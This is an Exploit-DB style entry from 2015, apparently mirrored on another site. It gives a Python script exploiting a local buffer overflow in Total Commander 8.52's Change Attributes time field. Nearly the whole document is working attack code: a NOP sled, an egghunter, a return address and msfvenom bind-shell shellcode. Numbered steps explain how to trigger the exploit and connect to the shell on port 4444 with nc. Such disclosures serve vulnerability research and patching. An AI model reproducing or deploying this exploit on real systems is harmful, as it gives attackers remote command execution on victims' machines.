Total Commander 8.52 – Local Buffer Overflow

  • 作者: VIKRAMADITYA
    日期: 2015-09-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38244/
  • #!/usr/bin/python 
    # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow 
    # AUTHOR: VIKRAMADITYA "-OPTIMUS"
    # Credits: Un_N0n
    # Date of Testing: 19th September 2015
    # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
    # Tested On : Windows XP Service Pack 2
    # Steps to Exploit
    # Step 1: Execute this python script
    # Step 2: This script will create a file called time.txt
    # Step 3: Copy the contents of time.txt file
    # Step 4: Now open Total Commander 8.52
    # Step 5: Go To file > Change Attributes.
    # Step 6: In time field paste the contents of time.txt
    # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc 
    file = open('time.txt' , 'w');
    
    buffer = "\x90"*190
    buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX 
    
    buffer += "\x90"*(265- len(buffer))
    
    buffer += "\x47\x47\xf7\x75"#75F74747 FFE0 JMP EAX
    
    # bad characters - \x00\x0a\x0d
    # msfvenom -p windows/shell_bind_tcp -f c-b '\x00\x0a\x0d'
    
    buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
    "\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11"
    "\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69"
    "\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4"
    "\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30"
    "\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3"
    "\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94"
    "\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b"
    "\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4"
    "\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5"
    "\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1"
    "\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16"
    "\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51"
    "\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3"
    "\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06"
    "\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49"
    "\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65"
    "\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf"
    "\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb"
    "\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba"
    "\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08"
    "\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b"
    "\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c"
    "\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")
    
    file.write(buffer)
    
    file.close()